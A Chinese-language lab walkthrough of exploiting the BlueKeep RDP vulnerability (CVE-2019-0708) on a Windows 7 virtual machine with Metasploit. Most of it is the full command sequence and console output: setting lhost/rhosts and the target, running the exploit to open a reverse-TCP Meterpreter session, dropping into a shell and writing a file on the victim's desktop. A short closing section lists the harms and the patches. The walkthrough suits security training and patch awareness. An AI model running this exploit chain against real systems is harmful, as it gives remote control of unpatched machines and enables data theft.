1、环境准备
- 靶机系统:en_windows_7_ultimate_with_sp1_x64_dvd_618240.iso
- 攻击载荷:Kali Linux VMware 64-Bit (7z)2021.1
2、配置准备
- 靶机与攻击机网络互通(攻击机172.29.128.5,靶机172.29.128.6)
──(kali㉿kali)-[~/Desktop]
└─$ ping 172.29.128.6
PING 172.29.128.4 (172.29.128.6) 56(84) bytes of data.
64 bytes from 172.29.128.6: icmp_seq=1 ttl=128 time=13.7 ms
64 bytes from 172.29.128.6: icmp_seq=2 ttl=128 time=0.218 ms
rtt min/avg/max/mdev = 0.218/6.940/13.662/6.722 ms
┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet `172.29.128.5` netmask 255.255.0.0 broadcast 172.29.255.255
inet6 fe80::20c:29ff:fe9f:24fb prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:9f:24:fb txqueuelen 1000 (Ethernet)
RX packets 4740844 bytes 314309577 (299.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7276969 bytes 8831983959 (8.2 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- 靶机开放远程桌面3389端口
3、攻击演练
3.1载荷设置
- 查询载荷信息
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search cve_2019_0708_bluekeep_rce
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- 进入载荷设置
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
- 设置本机反射地址
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 172.29.128.5
lhost => 172.29.128.5
- 设置靶机地址
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 172.29.128.6
rhosts => 172.29.128.6
- 设置target[参考4.2target选择]
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
- 可选
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set forceexploit true
forceexploit => true
3.2 使用攻击
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 172.29.128.5:4444
[*] 172.29.128.6:3389 - Executing automatic check (disable AutoCheck to override)
[*] 172.29.128.6:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 172.29.128.6:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 172.29.128.6:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 172.29.128.6:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.29.128.6:3389 - Surfing channels ...
[*] 172.29.128.6:3389 - Lobbing eggs ...
[*] 172.29.128.6:3389 - Forcing the USE of FREE'd object ...
[!] 172.29.128.6:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200262 bytes) to 172.29.128.6
[*] `Meterpreter session 1 opened (172.29.128.5:4444 -> 172.29.128.6:49157) `at 2021-05-01 18:08:01 -0400
3.3 获取shell
- systeminfo系统信息
meterpreter > shell
Process 2812 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
systeminfo
Host Name: `WIN-UMQ8R7HIGV8`
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00426-292-0000007-85573
Original Install Date: 5/2/2021, 2:50:09 AM
System Boot Time: 5/2/2021, 6:07:04 AM
···
- 桌面文件写入hi.txt
C:\>cd Users\dahouzi\Desktop
C:\Users\dahouzi\Desktop>echo "i am come in!" >>hi.txt
echo "i am come in!" >>hi.txt
4、危害及防御措施
4.1 两种危害
- 蓝屏
生产环境或个人电脑受到攻击时,大概率会蓝屏,此时正在运行的应用或在编辑的文档数据会丢失。
- 提权
远程提权成功,相当于我拥有你电脑的一切权限。你跟小三的照片,呵呵呵!
4.2 防御措施
- 安装补丁(防火墙不可防)
- 关闭3389端口或者指定IP访问
4.3 补丁地址
微软建议:https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708
-
Windows XP、Windows 2003:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 -
Windows 7、Windows 2008R2:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175 -
Windows 2008:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499180
5、其它信息
5.1 目标漏洞存活检测
- 172.29.128.4:3389 - The target is vulnerable.表示很脆弱,可能存在漏洞
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > auxiliary/scanner/rdp/ms12_020_check
[-] Unknown command: auxiliary/scanner/rdp/ms12_020_check.
This is a module we can load. Do you want to use auxiliary/scanner/rdp/ms12_020_check? [y/N] y
msf6 auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 172.29.128.4
RHOSTS => 172.29.128.4
msf6 auxiliary(scanner/rdp/ms12_020_check) > run
[+] 172.29.128.4:3389 - 172.29.128.4:3389 - The target is vulnerable.
[*] 172.29.128.4:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
5.2 攻击前信息确认
- targets选择
- RHOSTS:172.29.128.6
- RPORT:3389
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2019-05-14
Provided by:
Sean Dillon <sean.dillon@risksense.com>
Ryan Hanson
OJ Reeves <oj@beyondbinary.io>
Brent Cook <bcook@rapid7.com>
Available targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 172.29.128.7 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 172.29.128.6 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)